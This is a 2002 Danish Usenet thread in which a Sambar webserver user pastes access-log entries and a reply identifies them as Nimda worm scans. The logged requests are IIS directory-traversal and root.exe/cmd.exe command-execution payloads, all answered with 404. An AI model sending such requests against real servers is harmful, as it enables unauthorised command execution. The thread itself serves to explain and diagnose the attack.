---

Jeg sider og leje lidt med en sambar webserver, som ikke er tilmeldt nogen
steder, efter 10 min står der pludselig dette i loggen: Er det ikke en som
har forsøgt at hacke min server ???

[06/Mar/2002:12:22:05 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0
"-" "-"
[06/Mar/2002:12:22:06 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0
"-" "-"
[06/Mar/2002:12:22:06 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 0 0 "-" "-"
[06/Mar/2002:12:22:06 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 0 0 "-" "-"
[06/Mar/2002:12:22:06 +0100] "GET
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[06/Mar/2002:12:22:06 +0100] "GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 0 0 "-" "-"
[06/Mar/2002:12:22:07 +0100] "GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 0 0 "-" "-"
[06/Mar/2002:12:22:07 +0100] "GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+
dir HTTP/1.0" 404 0 0 "-" "-"
[06/Mar/2002:12:22:07 +0100] "GET
/scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[06/Mar/2002:12:22:07 +0100] "GET
/scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[06/Mar/2002:12:22:07 +0100] "GET
/scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
[06/Mar/2002:12:22:07 +0100] "GET
/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"

---

On 06 mar 2002 Anders enriched usenet with:

> Jeg sider og leje lidt med en sambar webserver, som ikke er
> tilmeldt nogen steder, efter 10 min står der pludselig dette i
> loggen: Er det ikke en som har forsøgt at hacke min server ???

SNIP log

Det er en server inficeret med Nimda, der leder efter andre sårbare
servere.

Dette svar kunne også findes blandt de ti første resultater ved en
søgning efter cmd.exe på Google

--
Lars Kyndi Laursen, representatum nixi

Si fractum non sit, noli id reficere